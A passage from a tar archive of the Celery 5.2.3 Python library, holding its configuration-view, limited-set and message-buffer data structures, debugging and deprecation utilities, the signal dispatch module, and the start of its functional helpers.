key) def _iterate_keys(self): # type: () -> Iterable return iter(dir(self.obj)) iterkeys = _iterate_keys def __iter__(self): # type: () -> Iterable return self._iterate_keys() def _iterate_items(self): # type: () -> Iterable for key in self._iterate_keys(): yield key, getattr(self.obj, key) iteritems = _iterate_items def _iterate_values(self): # type: () -> Iterable for key in self._iterate_keys(): yield getattr(self.obj, key) itervalues = _iterate_values items = _iterate_items keys = _iterate_keys values = _iterate_values MutableMapping.register(DictAttribute) class ChainMap(MutableMapping): """Key lookup on a sequence of maps.""" key_t = None changes = None defaults = None maps = None _observers = [] def __init__(self, *maps, **kwargs): # type: (*Mapping, **Any) -> None maps = list(maps or [{}]) self.__dict__.update( key_t=kwargs.get('key_t'), maps=maps, changes=maps[0], defaults=maps[1:], ) def add_defaults(self, d): # type: (Mapping) -> None d = force_mapping(d) self.defaults.insert(0, d) self.maps.insert(1, d) def pop(self, key, *default): # type: (Any, *Any) -> Any try: return self.maps[0].pop(key, *default) except KeyError: raise KeyError( f'Key not found in the first mapping: {key!r}') def __missing__(self, key): # type: (Any) -> Any raise KeyError(key) def _key(self, key): # type: (Any) -> Any return self.key_t(key) if self.key_t is not None else key def __getitem__(self, key): # type: (Any) -> Any _key = self._key(key) for mapping in self.maps: try: return mapping[_key] except KeyError: pass return self.__missing__(key) def __setitem__(self, key, value): # type: (Any, Any) -> None self.changes[self._key(key)] = value def __delitem__(self, key): # type: (Any) -> None try: del self.changes[self._key(key)] except KeyError: raise KeyError(f'Key not found in first mapping: {key!r}') def clear(self): # type: () -> None self.changes.clear() def get(self, key, default=None): # type: (Any, Any) -> Any try: return self[self._key(key)] except KeyError: return default def __len__(self): # type: () -> int return len(set().union(*self.maps)) def __iter__(self): return self._iterate_keys() def __contains__(self, key): # type: (Any) -> bool key = self._key(key) return any(key in m for m in self.maps) def __bool__(self): # type: () -> bool return any(self.maps) __nonzero__ = __bool__ # Py2 def setdefault(self, key, default=None): # type: (Any, Any) -> None key = self._key(key) if key not in self: self[key] = default def update(self, *args, **kwargs): # type: (*Any, **Any) -> Any result = self.changes.update(*args, **kwargs) for callback in self._observers: callback(*args, **kwargs) return result def __repr__(self): # type: () -> str return '{0.__class__.__name__}({1})'.format( self, ', '.join(map(repr, self.maps))) @classmethod def fromkeys(cls, iterable, *args): # type: (type, Iterable, *Any) -> 'ChainMap' """Create a ChainMap with a single dict created from the iterable.""" return cls(dict.fromkeys(iterable, *args)) def copy(self): # type: () -> 'ChainMap' return self.__class__(self.maps[0].copy(), *self.maps[1:]) __copy__ = copy # Py2 def _iter(self, op): # type: (Callable) -> Iterable # defaults must be first in the stream, so values in # changes take precedence. # pylint: disable=bad-reversed-sequence # Someone should teach pylint about properties. return chain(*(op(d) for d in reversed(self.maps))) def _iterate_keys(self): # type: () -> Iterable return uniq(self._iter(lambda d: d.keys())) iterkeys = _iterate_keys def _iterate_items(self): # type: () -> Iterable return ((key, self[key]) for key in self) iteritems = _iterate_items def _iterate_values(self): # type: () -> Iterable return (self[key] for key in self) itervalues = _iterate_values def bind_to(self, callback): self._observers.append(callback) keys = _iterate_keys items = _iterate_items values = _iterate_values class ConfigurationView(ChainMap, AttributeDictMixin): """A view over an applications configuration dictionaries. Custom (but older) version of :class:`collections.ChainMap`. If the key does not exist in ``changes``, the ``defaults`` dictionaries are consulted. Arguments: changes (Mapping): Map of configuration changes. defaults (List[Mapping]): List of dictionaries containing the default configuration. """ def __init__(self, changes, defaults=None, keys=None, prefix=None): # type: (Mapping, Mapping, List[str], str) -> None defaults = [] if defaults is None else defaults super().__init__(changes, *defaults) self.__dict__.update( prefix=prefix.rstrip('_') + '_' if prefix else prefix, _keys=keys, ) def _to_keys(self, key): # type: (str) -> Sequence[str] prefix = self.prefix if prefix: pkey = prefix + key if not key.startswith(prefix) else key return match_case(pkey, prefix), key return key, def __getitem__(self, key): # type: (str) -> Any keys = self._to_keys(key) getitem = super().__getitem__ for k in keys + ( tuple(f(key) for f in self._keys) if self._keys else ()): try: return getitem(k) except KeyError: pass try: # support subclasses implementing __missing__ return self.__missing__(key) except KeyError: if len(keys) > 1: raise KeyError( 'Key not found: {0!r} (with prefix: {0!r})'.format(*keys)) raise def __setitem__(self, key, value): # type: (str, Any) -> Any self.changes[self._key(key)] = value def first(self, *keys): # type: (*str) -> Any return first(None, (self.get(key) for key in keys)) def get(self, key, default=None): # type: (str, Any) -> Any try: return self[key] except KeyError: return default def clear(self): # type: () -> None """Remove all changes, but keep defaults.""" self.changes.clear() def __contains__(self, key): # type: (str) -> bool keys = self._to_keys(key) return any(any(k in m for k in keys) for m in self.maps) def swap_with(self, other): # type: (ConfigurationView) -> None changes = other.__dict__['changes'] defaults = other.__dict__['defaults'] self.__dict__.update( changes=changes, defaults=defaults, key_t=other.__dict__['key_t'], prefix=other.__dict__['prefix'], maps=[changes] + defaults ) class LimitedSet: """Kind-of Set (or priority queue) with limitations. Good for when you need to test for membership (`a in set`), but the set should not grow unbounded. ``maxlen`` is enforced at all times, so if the limit is reached we'll also remove non-expired items. You can also configure ``minlen``: this is the minimal residual size of the set. All arguments are optional, and no limits are enabled by default. Arguments: maxlen (int): Optional max number of items. Adding more items than ``maxlen`` will result in immediate removal of items sorted by oldest insertion time. expires (float): TTL for all items. Expired items are purged as keys are inserted. minlen (int): Minimal residual size of this set. .. versionadded:: 4.0 Value must be less than ``maxlen`` if both are configured. Older expired items will be deleted, only after the set exceeds ``minlen`` number of items. data (Sequence): Initial data to initialize set with. Can be an iterable of ``(key, value)`` pairs, a dict (``{key: insertion_time}``), or another instance of :class:`LimitedSet`. Example: >>> s = LimitedSet(maxlen=50000, expires=3600, minlen=4000) >>> for i in range(60000): ... s.add(i) ... s.add(str(i)) ... >>> 57000 in s # last 50k inserted values are kept True >>> '10' in s # '10' did expire and was purged from set. False >>> len(s) # maxlen is reached 50000 >>> s.purge(now=time.monotonic() + 7200) # clock + 2 hours >>> len(s) # now only minlen items are cached 4000 >>>> 57000 in s # even this item is gone now False """ max_heap_percent_overload = 15 def __init__(self, maxlen=0, expires=0, data=None, minlen=0): # type: (int, float, Mapping, int) -> None self.maxlen = 0 if maxlen is None else maxlen self.minlen = 0 if minlen is None else minlen self.expires = 0 if expires is None else expires self._data = {} self._heap = [] if data: # import items from data self.update(data) if not self.maxlen >= self.minlen >= 0: raise ValueError( 'minlen must be a positive number, less or equal to maxlen.') if self.expires < 0: raise ValueError('expires cannot be negative!') def _refresh_heap(self): # type: () -> None """Time consuming recreating of heap. Don't run this too often.""" self._heap[:] = [entry for entry in self._data.values()] heapify(self._heap) def _maybe_refresh_heap(self): # type: () -> None if self._heap_overload >= self.max_heap_percent_overload: self._refresh_heap() def clear(self): # type: () -> None """Clear all data, start from scratch again.""" self._data.clear() self._heap[:] = [] def add(self, item, now=None): # type: (Any, float) -> None """Add a new item, or reset the expiry time of an existing item.""" now = now or time.monotonic() if item in self._data: self.discard(item) entry = (now, item) self._data[item] = entry heappush(self._heap, entry) if self.maxlen and len(self._data) >= self.maxlen: self.purge() def update(self, other): # type: (Iterable) -> None """Update this set from other LimitedSet, dict or iterable.""" if not other: return if isinstance(other, LimitedSet): self._data.update(other._data) self._refresh_heap() self.purge() elif isinstance(other, dict): # revokes are sent as a dict for key, inserted in other.items(): if isinstance(inserted, (tuple, list)): # in case someone uses ._data directly for sending update inserted = inserted[0] if not isinstance(inserted, float): raise ValueError( 'Expecting float timestamp, got type ' f'{type(inserted)!r} with value: {inserted}') self.add(key, inserted) else: # XXX AVOID THIS, it could keep old data if more parties # exchange them all over and over again for obj in other: self.add(obj) def discard(self, item): # type: (Any) -> None # mark an existing item as removed. If KeyError is not found, pass. self._data.pop(item, None) self._maybe_refresh_heap() pop_value = discard def purge(self, now=None): # type: (float) -> None """Check oldest items and remove them if needed. Arguments: now (float): Time of purging -- by default right now. This can be useful for unit testing. """ now = now or time.monotonic() now = now() if isinstance(now, Callable) else now if self.maxlen: while len(self._data) > self.maxlen: self.pop() # time based expiring: if self.expires: while len(self._data) > self.minlen >= 0: inserted_time, _ = self._heap[0] if inserted_time + self.expires > now: break # oldest item hasn't expired yet self.pop() def pop(self, default=None): # type: (Any) -> Any """Remove and return the oldest item, or :const:`None` when empty.""" while self._heap: _, item = heappop(self._heap) try: self._data.pop(item) except KeyError: pass else: return item return default def as_dict(self): # type: () -> Dict """Whole set as serializable dictionary. Example: >>> s = LimitedSet(maxlen=200) >>> r = LimitedSet(maxlen=200) >>> for i in range(500): ... s.add(i) ... >>> r.update(s.as_dict()) >>> r == s True """ return {key: inserted for inserted, key in self._data.values()} def __eq__(self, other): # type: (Any) -> bool return self._data == other._data def __ne__(self, other): # type: (Any) -> bool return not self.__eq__(other) def __repr__(self): # type: () -> str return REPR_LIMITED_SET.format( self, name=type(self).__name__, size=len(self), ) def __iter__(self): # type: () -> Iterable return (i for _, i in sorted(self._data.values())) def __len__(self): # type: () -> int return len(self._data) def __contains__(self, key): # type: (Any) -> bool return key in self._data def __reduce__(self): # type: () -> Any return self.__class__, ( self.maxlen, self.expires, self.as_dict(), self.minlen) def __bool__(self): # type: () -> bool return bool(self._data) __nonzero__ = __bool__ # Py2 @property def _heap_overload(self): # type: () -> float """Compute how much is heap bigger than data [percents].""" return len(self._heap) * 100 / max(len(self._data), 1) - 100 MutableSet.register(LimitedSet) class Evictable: """Mixin for classes supporting the ``evict`` method.""" Empty = Empty def evict(self): # type: () -> None """Force evict until maxsize is enforced.""" self._evict(range=count) def _evict(self, limit=100, range=range): # type: (int) -> None try: [self._evict1() for _ in range(limit)] except IndexError: pass def _evict1(self): # type: () -> None if self._evictcount <= self.maxsize: raise IndexError() try: self._pop_to_evict() except self.Empty: raise IndexError() class Messagebuffer(Evictable): """A buffer of pending messages.""" Empty = Empty def __init__(self, maxsize, iterable=None, deque=deque): # type: (int, Iterable, Any) -> None self.maxsize = maxsize self.data = deque(iterable or []) self._append = self.data.append self._pop = self.data.popleft self._len = self.data.__len__ self._extend = self.data.extend def put(self, item): # type: (Any) -> None self._append(item) self.maxsize and self._evict() def extend(self, it): # type: (Iterable) -> None self._extend(it) self.maxsize and self._evict() def take(self, *default): # type: (*Any) -> Any try: return self._pop() except IndexError: if default: return default[0] raise self.Empty() def _pop_to_evict(self): # type: () -> None return self.take() def __repr__(self): # type: () -> str return f'<{type(self).__name__}: {len(self)}/{self.maxsize}>' def __iter__(self): # type: () -> Iterable while 1: try: yield self._pop() except IndexError: break def __len__(self): # type: () -> int return self._len() def __contains__(self, item): # type: () -> bool return item in self.data def __reversed__(self): # type: () -> Iterable return reversed(self.data) def __getitem__(self, index): # type: (Any) -> Any return self.data[index] @property def _evictcount(self): # type: () -> int return len(self) Sequence.register(Messagebuffer) class BufferMap(OrderedDict, Evictable): """Map of buffers.""" Buffer = Messagebuffer Empty = Empty maxsize = None total = 0 bufmaxsize = None def __init__(self, maxsize, iterable=None, bufmaxsize=1000): # type: (int, Iterable, int) -> None super().__init__() self.maxsize = maxsize self.bufmaxsize = 1000 if iterable: self.update(iterable) self.total = sum(len(buf) for buf in self.items()) def put(self, key, item): # type: (Any, Any) -> None self._get_or_create_buffer(key).put(item) self.total += 1 self.move_to_end(key) # least recently used. self.maxsize and self._evict() def extend(self, key, it): # type: (Any, Iterable) -> None self._get_or_create_buffer(key).extend(it) self.total += len(it) self.maxsize and self._evict() def take(self, key, *default): # type: (Any, *Any) -> Any item, throw = None, False try: buf = self[key] except KeyError: throw = True else: try: item = buf.take() self.total -= 1 except self.Empty: throw = True else: self.move_to_end(key) # mark as LRU if throw: if default: return default[0] raise self.Empty() return item def _get_or_create_buffer(self, key): # type: (Any) -> Messagebuffer try: return self[key] except KeyError: buf = self[key] = self._new_buffer() return buf def _new_buffer(self): # type: () -> Messagebuffer return self.Buffer(maxsize=self.bufmaxsize) def _LRUpop(self, *default): # type: (*Any) -> Any return self[self._LRUkey()].take(*default) def _pop_to_evict(self): # type: () -> None for _ in range(100): key = self._LRUkey() buf = self[key] try: buf.take() except (IndexError, self.Empty): # buffer empty, remove it from mapping. self.pop(key) else: # we removed one item self.total -= 1 # if buffer is empty now, remove it from mapping. if not len(buf): self.pop(key) else: # move to least recently used. self.move_to_end(key) break def __repr__(self): # type: () -> str return f'<{type(self).__name__}: {self.total}/{self.maxsize}>' @property def _evictcount(self): # type: () -> int return self.total ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/debug.py0000664000175000017500000001114500000000000016762 0ustar00asifasif00000000000000"""Utilities for debugging memory usage, blocking calls, etc.""" import os import sys import traceback from contextlib import contextmanager from functools import partial from pprint import pprint from celery.platforms import signals from celery.utils.text import WhateverIO try: from psutil import Process except ImportError: Process = None __all__ = ( 'blockdetection', 'sample_mem', 'memdump', 'sample', 'humanbytes', 'mem_rss', 'ps', 'cry', ) UNITS = ( (2 ** 40.0, 'TB'), (2 ** 30.0, 'GB'), (2 ** 20.0, 'MB'), (2 ** 10.0, 'KB'), (0.0, 'b'), ) _process = None _mem_sample = [] def _on_blocking(signum, frame): import inspect raise RuntimeError( f'Blocking detection timed-out at: {inspect.getframeinfo(frame)}' ) @contextmanager def blockdetection(timeout): """Context that raises an exception if process is blocking. Uses ``SIGALRM`` to detect blocking functions. """ if not timeout: yield else: old_handler = signals['ALRM'] old_handler = None if old_handler == _on_blocking else old_handler signals['ALRM'] = _on_blocking try: yield signals.arm_alarm(timeout) finally: if old_handler: signals['ALRM'] = old_handler signals.reset_alarm() def sample_mem(): """Sample RSS memory usage. Statistics can then be output by calling :func:`memdump`. """ current_rss = mem_rss() _mem_sample.append(current_rss) return current_rss def _memdump(samples=10): # pragma: no cover S = _mem_sample prev = list(S) if len(S) <= samples else sample(S, samples) _mem_sample[:] = [] import gc gc.collect() after_collect = mem_rss() return prev, after_collect def memdump(samples=10, file=None): # pragma: no cover """Dump memory statistics. Will print a sample of all RSS memory samples added by calling :func:`sample_mem`, and in addition print used RSS memory after :func:`gc.collect`. """ say = partial(print, file=file) if ps() is None: say('- rss: (psutil not installed).') return prev, after_collect = _memdump(samples) if prev: say('- rss (sample):') for mem in prev: say(f'- > {mem},') say(f'- rss (end): {after_collect}.') def sample(x, n, k=0): """Given a list `x` a sample of length ``n`` of that list is returned. For example, if `n` is 10, and `x` has 100 items, a list of every tenth. item is returned. ``k`` can be used as offset. """ j = len(x) // n for _ in range(n): try: yield x[k] except IndexError: break k += j def hfloat(f, p=5): """Convert float to value suitable for humans. Arguments: f (float): The floating point number. p (int): Floating point precision (default is 5). """ i = int(f) return i if i == f else '{0:.{p}}'.format(f, p=p) def humanbytes(s): """Convert bytes to human-readable form (e.g., KB, MB).""" return next( f'{hfloat(s / div if div else s)}{unit}' for div, unit in UNITS if s >= div ) def mem_rss(): """Return RSS memory usage as a humanized string.""" p = ps() if p is not None: return humanbytes(_process_memory_info(p).rss) def ps(): # pragma: no cover """Return the global :class:`psutil.Process` instance. Note: Returns :const:`None` if :pypi:`psutil` is not installed. """ global _process if _process is None and Process is not None: _process = Process(os.getpid()) return _process def _process_memory_info(process): try: return process.memory_info() except AttributeError: return process.get_memory_info() def cry(out=None, sepchr='=', seplen=49): # pragma: no cover """Return stack-trace of all active threads. See Also: Taken from https://gist.github.com/737056. """ import threading out = WhateverIO() if out is None else out P = partial(print, file=out) # get a map of threads by their ID so we can print their names # during the traceback dump tmap = {t.ident: t for t in threading.enumerate()} sep = sepchr * seplen for tid, frame in sys._current_frames().items(): thread = tmap.get(tid) if not thread: # skip old junk (left-overs from a fork) continue P(f'{thread.name}') P(sep) traceback.print_stack(frame, file=out) P(sep) P('LOCAL VARIABLES') P(sep) pprint(frame.f_locals, stream=out) P('\n') return out.getvalue() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/deprecated.py0000664000175000017500000000704400000000000017777 0ustar00asifasif00000000000000"""Deprecation utilities.""" import warnings from vine.utils import wraps from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning __all__ = ('Callable', 'Property', 'warn') PENDING_DEPRECATION_FMT = """ {description} is scheduled for deprecation in \ version {deprecation} and removal in version v{removal}. \ {alternative} """ DEPRECATION_FMT = """ {description} is deprecated and scheduled for removal in version {removal}. {alternative} """ def warn(description=None, deprecation=None, removal=None, alternative=None, stacklevel=2): """Warn of (pending) deprecation.""" ctx = {'description': description, 'deprecation': deprecation, 'removal': removal, 'alternative': alternative} if deprecation is not None: w = CPendingDeprecationWarning(PENDING_DEPRECATION_FMT.format(**ctx)) else: w = CDeprecationWarning(DEPRECATION_FMT.format(**ctx)) warnings.warn(w, stacklevel=stacklevel) def Callable(deprecation=None, removal=None, alternative=None, description=None): """Decorator for deprecated functions. A deprecation warning will be emitted when the function is called. Arguments: deprecation (str): Version that marks first deprecation, if this argument isn't set a ``PendingDeprecationWarning`` will be emitted instead. removal (str): Future version when this feature will be removed. alternative (str): Instructions for an alternative solution (if any). description (str): Description of what's being deprecated. """ def _inner(fun): @wraps(fun) def __inner(*args, **kwargs): from .imports import qualname warn(description=description or qualname(fun), deprecation=deprecation, removal=removal, alternative=alternative, stacklevel=3) return fun(*args, **kwargs) return __inner return _inner def Property(deprecation=None, removal=None, alternative=None, description=None): """Decorator for deprecated properties.""" def _inner(fun): return _deprecated_property( fun, deprecation=deprecation, removal=removal, alternative=alternative, description=description or fun.__name__) return _inner class _deprecated_property: def __init__(self, fget=None, fset=None, fdel=None, doc=None, **depreinfo): self.__get = fget self.__set = fset self.__del = fdel self.__name__, self.__module__, self.__doc__ = ( fget.__name__, fget.__module__, fget.__doc__, ) self.depreinfo = depreinfo self.depreinfo.setdefault('stacklevel', 3) def __get__(self, obj, type=None): if obj is None: return self warn(**self.depreinfo) return self.__get(obj) def __set__(self, obj, value): if obj is None: return self if self.__set is None: raise AttributeError('cannot set attribute') warn(**self.depreinfo) self.__set(obj, value) def __delete__(self, obj): if obj is None: return self if self.__del is None: raise AttributeError('cannot delete attribute') warn(**self.depreinfo) self.__del(obj) def setter(self, fset): return self.__class__(self.__get, fset, self.__del, **self.depreinfo) def deleter(self, fdel): return self.__class__(self.__get, self.__set, fdel, **self.depreinfo) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4957514 celery-5.2.3/celery/utils/dispatch/0000775000175000017500000000000000000000000017117 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/dispatch/__init__.py0000664000175000017500000000011200000000000021222 0ustar00asifasif00000000000000"""Observer pattern.""" from .signal import Signal __all__ = ('Signal',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/dispatch/signal.py0000664000175000017500000003244300000000000020754 0ustar00asifasif00000000000000"""Implementation of the Observer pattern.""" import sys import threading import warnings import weakref from weakref import WeakMethod from kombu.utils.functional import retry_over_time from celery.exceptions import CDeprecationWarning from celery.local import PromiseProxy, Proxy from celery.utils.functional import fun_accepts_kwargs from celery.utils.log import get_logger from celery.utils.time import humanize_seconds __all__ = ('Signal',) logger = get_logger(__name__) def _make_id(target): # pragma: no cover if isinstance(target, Proxy): target = target._get_current_object() if isinstance(target, (bytes, str)): # see Issue #2475 return target if hasattr(target, '__func__'): return id(target.__func__) return id(target) def _boundmethod_safe_weakref(obj): """Get weakref constructor appropriate for `obj`. `obj` may be a bound method. Bound method objects must be special-cased because they're usually garbage collected immediately, even if the instance they're bound to persists. Returns: a (weakref constructor, main object) tuple. `weakref constructor` is either :class:`weakref.ref` or :class:`weakref.WeakMethod`. `main object` is the instance that `obj` is bound to if it is a bound method; otherwise `main object` is simply `obj. """ try: obj.__func__ obj.__self__ # Bound method return WeakMethod, obj.__self__ except AttributeError: # Not a bound method return weakref.ref, obj def _make_lookup_key(receiver, sender, dispatch_uid): if dispatch_uid: return (dispatch_uid, _make_id(sender)) else: return (_make_id(receiver), _make_id(sender)) NONE_ID = _make_id(None) NO_RECEIVERS = object() RECEIVER_RETRY_ERROR = """\ Could not process signal receiver %(receiver)s. Retrying %(when)s...\ """ class Signal: # pragma: no cover """Create new signal. Keyword Arguments: providing_args (List): A list of the arguments this signal can pass along in a :meth:`send` call. use_caching (bool): Enable receiver cache. name (str): Name of signal, used for debugging purposes. """ #: Holds a dictionary of #: ``{receiverkey (id): weakref(receiver)}`` mappings. receivers = None def __init__(self, providing_args=None, use_caching=False, name=None): self.receivers = [] self.providing_args = set( providing_args if providing_args is not None else []) self.lock = threading.Lock() self.use_caching = use_caching self.name = name # For convenience we create empty caches even if they are not used. # A note about caching: if use_caching is defined, then for each # distinct sender we cache the receivers that sender has in # 'sender_receivers_cache'. The cache is cleaned when .connect() or # .disconnect() is called and populated on .send(). self.sender_receivers_cache = ( weakref.WeakKeyDictionary() if use_caching else {} ) self._dead_receivers = False def _connect_proxy(self, fun, sender, weak, dispatch_uid): return self.connect( fun, sender=sender._get_current_object(), weak=weak, dispatch_uid=dispatch_uid, ) def connect(self, *args, **kwargs): """Connect receiver to sender for signal. Arguments: receiver (Callable): A function or an instance method which is to receive signals. Receivers must be hashable objects. if weak is :const:`True`, then receiver must be weak-referenceable. Receivers must be able to accept keyword arguments. If receivers have a `dispatch_uid` attribute, the receiver will not be added if another receiver already exists with that `dispatch_uid`. sender (Any): The sender to which the receiver should respond. Must either be a Python object, or :const:`None` to receive events from any sender. weak (bool): Whether to use weak references to the receiver. By default, the module will attempt to use weak references to the receiver objects. If this parameter is false, then strong references will be used. dispatch_uid (Hashable): An identifier used to uniquely identify a particular instance of a receiver. This will usually be a string, though it may be anything hashable. retry (bool): If the signal receiver raises an exception (e.g. ConnectionError), the receiver will be retried until it runs successfully. A strong ref to the receiver will be stored and the `weak` option will be ignored. """ def _handle_options(sender=None, weak=True, dispatch_uid=None, retry=False): def _connect_signal(fun): options = {'dispatch_uid': dispatch_uid, 'weak': weak} def _retry_receiver(retry_fun): def _try_receiver_over_time(*args, **kwargs): def on_error(exc, intervals, retries): interval = next(intervals) err_msg = RECEIVER_RETRY_ERROR % \ {'receiver': retry_fun, 'when': humanize_seconds(interval, 'in', ' ')} logger.error(err_msg) return interval return retry_over_time(retry_fun, Exception, args, kwargs, on_error) return _try_receiver_over_time if retry: options['weak'] = False if not dispatch_uid: # if there's no dispatch_uid then we need to set the # dispatch uid to the original func id so we can look # it up later with the original func id options['dispatch_uid'] = _make_id(fun) fun = _retry_receiver(fun) self._connect_signal(fun, sender, options['weak'], options['dispatch_uid']) return fun return _connect_signal if args and callable(args[0]): return _handle_options(*args[1:], **kwargs)(args[0]) return _handle_options(*args, **kwargs) def _connect_signal(self, receiver, sender, weak, dispatch_uid): assert callable(receiver), 'Signal receivers must be callable' if not fun_accepts_kwargs(receiver): raise ValueError( 'Signal receiver must accept keyword arguments.') if isinstance(sender, PromiseProxy): sender.__then__( self._connect_proxy, receiver, sender, weak, dispatch_uid, ) return receiver lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) if weak: ref, receiver_object = _boundmethod_safe_weakref(receiver) receiver = ref(receiver) weakref.finalize(receiver_object, self._remove_receiver) with self.lock: self._clear_dead_receivers() for r_key, _ in self.receivers: if r_key == lookup_key: break else: self.receivers.append((lookup_key, receiver)) self.sender_receivers_cache.clear() return receiver def disconnect(self, receiver=None, sender=None, weak=None, dispatch_uid=None): """Disconnect receiver from sender for signal. If weak references are used, disconnect needn't be called. The receiver will be removed from dispatch automatically. Arguments: receiver (Callable): The registered receiver to disconnect. May be none if `dispatch_uid` is specified. sender (Any): The registered sender to disconnect. weak (bool): The weakref state to disconnect. dispatch_uid (Hashable): The unique identifier of the receiver to disconnect. """ if weak is not None: warnings.warn( 'Passing `weak` to disconnect has no effect.', CDeprecationWarning, stacklevel=2) lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) disconnected = False with self.lock: self._clear_dead_receivers() for index in range(len(self.receivers)): (r_key, _) = self.receivers[index] if r_key == lookup_key: disconnected = True del self.receivers[index] break self.sender_receivers_cache.clear() return disconnected def has_listeners(self, sender=None): return bool(self._live_receivers(sender)) def send(self, sender, **named): """Send signal from sender to all connected receivers. If any receiver raises an error, the exception is returned as the corresponding response. (This is different from the "send" in Django signals. In Celery "send" and "send_robust" do the same thing.) Arguments: sender (Any): The sender of the signal. Either a specific object or :const:`None`. **named (Any): Named arguments which will be passed to receivers. Returns: List: of tuple pairs: `[(receiver, response), … ]`. """ responses = [] if not self.receivers or \ self.sender_receivers_cache.get(sender) is NO_RECEIVERS: return responses for receiver in self._live_receivers(sender): try: response = receiver(signal=self, sender=sender, **named) except Exception as exc: # pylint: disable=broad-except if not hasattr(exc, '__traceback__'): exc.__traceback__ = sys.exc_info()[2] logger.exception( 'Signal handler %r raised: %r', receiver, exc) responses.append((receiver, exc)) else: responses.append((receiver, response)) return responses send_robust = send # Compat with Django interface. def _clear_dead_receivers(self): # Warning: caller is assumed to hold self.lock if self._dead_receivers: self._dead_receivers = False new_receivers = [] for r in self.receivers: if isinstance(r[1], weakref.ReferenceType) and r[1]() is None: continue new_receivers.append(r) self.receivers = new_receivers def _live_receivers(self, sender): """Filter sequence of receivers to get resolved, live receivers. This checks for weak references and resolves them, then returning only live receivers. """ receivers = None if self.use_caching and not self._dead_receivers: receivers = self.sender_receivers_cache.get(sender) # We could end up here with NO_RECEIVERS even if we do check this # case in .send() prior to calling _Live_receivers() due to # concurrent .send() call. if receivers is NO_RECEIVERS: return [] if receivers is None: with self.lock: self._clear_dead_receivers() senderkey = _make_id(sender) receivers = [] for (receiverkey, r_senderkey), receiver in self.receivers: if r_senderkey == NONE_ID or r_senderkey == senderkey: receivers.append(receiver) if self.use_caching: if not receivers: self.sender_receivers_cache[sender] = NO_RECEIVERS else: # Note: we must cache the weakref versions. self.sender_receivers_cache[sender] = receivers non_weak_receivers = [] for receiver in receivers: if isinstance(receiver, weakref.ReferenceType): # Dereference the weak reference. receiver = receiver() if receiver is not None: non_weak_receivers.append(receiver) else: non_weak_receivers.append(receiver) return non_weak_receivers def _remove_receiver(self, receiver=None): """Remove dead receivers from connections.""" # Mark that the self..receivers first has dead weakrefs. If so, # we will clean those up in connect, disconnect and _live_receivers # while holding self.lock. Note that doing the cleanup here isn't a # good idea, _remove_receiver() will be called as a side effect of # garbage collection, and so the call can happen wh ile we are already # holding self.lock. self._dead_receivers = True def __repr__(self): """``repr(signal)``.""" return f'<{type(self).__name__}: {self.name} providing_args={self.providing_args!r}>' def __str__(self): """``str(signal)``.""" return repr(self) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/functional.py0000664000175000017500000002676200000000000020051 0ustar00asifasif00000000000000"""Functional-style utilities.""" import inspect import sys from collections import UserList from functools import partial from itertools import islice, tee, zip_longest from kombu.utils.functional import (LRUCache, dictfilter, is_list, lazy, maybe_evaluate, maybe_list, memoize) from vine import promise __all__ = ( 'LRUCache', 'is_list', 'maybe_list', 'memoize', 'mlazy', 'noop', 'first', 'firstmethod', 'chunks', 'padlist', 'mattrgetter', 'uniq', 'regen', 'dictfilter', 'lazy', 'maybe_evaluate', 'head_from_fun', 'maybe', 'fun_accepts_kwargs', ) FUNHEAD_TEMPLATE = """ def {fun_name}({fun_args}): return {fun_value} """ class DummyContext: def __enter__(self): return self def __exit__(self, *exc_info): pass class mlazy(lazy): """Memoized lazy evaluation. The function is only evaluated once, every subsequent access will return the same value. """ #: Set to :const:`True` after the object has been evaluated. evaluated = False _value = None def evaluate(self): if not self.evaluated: self._value = super().evaluate() self.evaluated = True return self._value def noop(*args, **kwargs): """No operation. Takes any arguments/keyword arguments and does nothing. """ def pass1(arg, *args, **kwargs): """Return the first positional argument.""" return arg def evaluate_promises(it): for value in it: if isinstance(value, promise): value = value() yield value def first(predicate, it): """Return the first element in ``it`` that ``predicate`` accepts. If ``predicate`` is None it will return the first item that's not :const:`None`. """ return next( (v for v in evaluate_promises(it) if ( predicate(v) if predicate is not None else v is not None)), None, ) def firstmethod(method, on_call=None): """Multiple dispatch. Return a function that with a list of instances, finds the first instance that gives a value for the given method. The list can also contain lazy instances (:class:`~kombu.utils.functional.lazy`.) """ def _matcher(it, *args, **kwargs): for obj in it: try: meth = getattr(maybe_evaluate(obj), method) reply = (on_call(meth, *args, **kwargs) if on_call else meth(*args, **kwargs)) except AttributeError: pass else: if reply is not None: return reply return _matcher def chunks(it, n): """Split an iterator into chunks with `n` elements each. Warning: ``it`` must be an actual iterator, if you pass this a concrete sequence will get you repeating elements. So ``chunks(iter(range(1000)), 10)`` is fine, but ``chunks(range(1000), 10)`` is not. Example: # n == 2 >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 2) >>> list(x) [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]] # n == 3 >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 3) >>> list(x) [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]] """ for item in it: yield [item] + list(islice(it, n - 1)) def padlist(container, size, default=None): """Pad list with default elements. Example: >>> first, last, city = padlist(['George', 'Costanza', 'NYC'], 3) ('George', 'Costanza', 'NYC') >>> first, last, city = padlist(['George', 'Costanza'], 3) ('George', 'Costanza', None) >>> first, last, city, planet = padlist( ... ['George', 'Costanza', 'NYC'], 4, default='Earth', ... ) ('George', 'Costanza', 'NYC', 'Earth') """ return list(container)[:size] + [default] * (size - len(container)) def mattrgetter(*attrs): """Get attributes, ignoring attribute errors. Like :func:`operator.itemgetter` but return :const:`None` on missing attributes instead of raising :exc:`AttributeError`. """ return lambda obj: 